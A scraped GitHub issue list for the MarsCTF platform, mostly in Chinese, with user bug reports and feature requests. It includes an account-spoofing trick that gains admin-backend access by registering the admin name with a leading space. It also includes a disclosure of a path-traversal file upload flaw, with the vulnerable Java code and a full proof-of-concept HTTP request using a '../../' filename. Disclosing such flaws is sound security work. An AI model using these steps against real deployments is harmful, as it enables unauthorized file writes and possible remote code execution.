b1ackc4t / marsctf Goto Github PK

注册界面，用户名密码什么都不填，直接点注册，可以注册成功

自己出题遇到了一些问题，因为调试不好推送到docker hub，遂按照docker官方教程搭建了一个本地registry，但是在MarsCTF的后台配置中更改docker Registry地址无效，题目显示找不到镜像,
我仔细想了一下，发现这个功能其实并不需要自己搭建registry，只需要在拉取镜像时优先使用本地镜像即可，
具体来说就是，拉取镜像前先检测一下本地镜像，如果存在则优先使用本地镜像，因为本人java水平不够，所以希望得到大佬的帮助，谢谢

1、第一张图片中，点击的是所有ALL，应该显示出所有题目呀，为什么只显示WEB的题目
2、后台添加题目，为什么不加一个放链接的地方，用户看到题目时，直接点击跳转就可以了

首先得到管理员账号，例如管理员账号是admin
然后注册一个账号，给admin前加个空格，就是 admin
然后注册成功后就能进入后台，随意修改东西，虽然角色是ROLE_user，但实际能修改任何东西！

尝试了修改 文件夹权限+管理员+普通用户权限都无法上传

缺少数据库sq文件，本地无法运行l

{flag: false, msg: "服务器故障 请稍后再试"}
flag: false
msg: "服务器故障 请稍后再试"

[root@localhost marsctf-docker]# docker-compose restart
[+] Running 3/3
⠿ Container marsctf-docker-db-1 St... 4.7s
⠿ Container marsctf-docker-main-1 Started 0.9s
⠿ Container marsctf-docker-nginx-1 Started 0.9s

这个是docker启动的容器

请问是什么问题，我觉得是后端服务没起来，但是我对java不熟，不知道怎么处理，谢谢

能否新增组队功能

Describe

MarsCTF found in its V1.2.1 version that there is an arbitrary file upload vulnerability in the interface for uploading attachments in the background. Attackers can construct filenames like ../../file to upload arbitrary files to arbitrary directories.

unsafe code

https://github.com/b1ackc4t/MarsCTF/blob/V1.2.1/src/main/java/com/b1ackc4t/marsctfserver/service/impl/CTFFileServiceImpl.java#L46

 public ReturnRes upload(MultipartFile file) {
        if (file.isEmpty()) {
            return new ReturnRes(false, "上传失败，请选择文件");
        }

        String fileName = file.getOriginalFilename();
        String snowId = String.valueOf(SnowFlakeUtil.generatorUid());
        File pathFile = new File(uploadPath, snowId); // 为每个文件单独创建一个文件夹 文件夹名采用雪花算法
        String path = pathFile.toString();
        if (!pathFile.mkdir()) {
            return new ReturnRes(false, "上传失败，服务器错误");
        }
        File dest = new File(path, fileName);
        try {
            file.transferTo(dest);  // 上传成功
            CTFFile ctfFile = new CTFFile(new File(snowId, fileName).toString());
            int lastIndexOf = fileName.lastIndexOf(".");
            String ext = lastIndexOf != -1 ? fileName.substring(lastIndexOf + 1) : "";
            ctfFile.setFname(dest.getName());
            ctfFile.setSize(dest.length()); // 单位字节
            ctfFile.setExt(ext);
            this.save(ctfFile);
            return new ReturnRes(true, ctfFile.getFid());
        } catch (IOException e) {
            e.printStackTrace();
        }
        return new ReturnRes(false, "上传失败，服务器错误");
    }

POC

POST /api/admin/uploadCTFFile HTTP/1.1
Host: 127.0.0.1:7991
Content-Length: 212
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"
Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJMT0dJTl9LRVkiOiJkMTY4OGM5MC02OTE5LTQyMWQtYmNlNi0wNzBlNjJjZDFmMjYifQ.ATcpBgxvayuZGVlUgNCKS9daRzYHZvEhovz6yz607OA
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBqYTzzXHADWlZYul
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
sec-ch-ua-platform: "Windows"
Accept: */*
Origin: http://127.0.0.1:7991
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:7991/admin/challenge/add
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Mars-Token=eyJhbGciOiJIUzI1NiJ9.eyJMT0dJTl9LRVkiOiJkMTY4OGM5MC02OTE5LTQyMWQtYmNlNi0wNzBlNjJjZDFmMjYifQ.ATcpBgxvayuZGVlUgNCKS9daRzYHZvEhovz6yz607OA
Connection: close

------WebKitFormBoundaryBqYTzzXHADWlZYul
Content-Disposition: form-data; name="file"; filename="../../hackFile"
Content-Type: application/octet-stream

hackFile

------WebKitFormBoundaryBqYTzzXHADWlZYul--

impact

Attackers can exploit this vulnerability to upload dynamic link libraries or write scheduled tasks to implement RCE.